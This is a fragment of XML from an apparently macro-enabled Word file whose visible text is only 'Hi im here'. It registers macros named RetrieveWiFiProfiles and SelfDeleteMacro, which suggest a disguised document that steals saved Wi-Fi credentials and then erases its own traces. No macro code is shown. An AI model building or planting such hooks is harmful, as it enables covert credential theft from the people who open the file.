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4201" w:rsidRDefault="00B84201">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t xml:space="preserve">Hi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>im</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> here</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B8420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4201"/>
    <w:rsid w:val="001A6FD1"/>
    <w:rsid w:val="004E1472"/>
    <w:rsid w:val="009669C6"/>
    <w:rsid w:val="00A27562"/>
    <w:rsid w:val="00B84201"/>
    <w:rsid w:val="00D12A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79A4954-2EA5-4A60-B4DE-5BD525F32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RETRIEVEWIFIPROFILES" wne:name="Project.Module1.RetrieveWiFiProfiles" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.MODULE1.SELFDELETEMACRO" wne:name="Project.Module1.SelfDelete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MRT www.Win2Farsi.com</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>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account</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Microsoft account</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-27T18:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-27T18:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>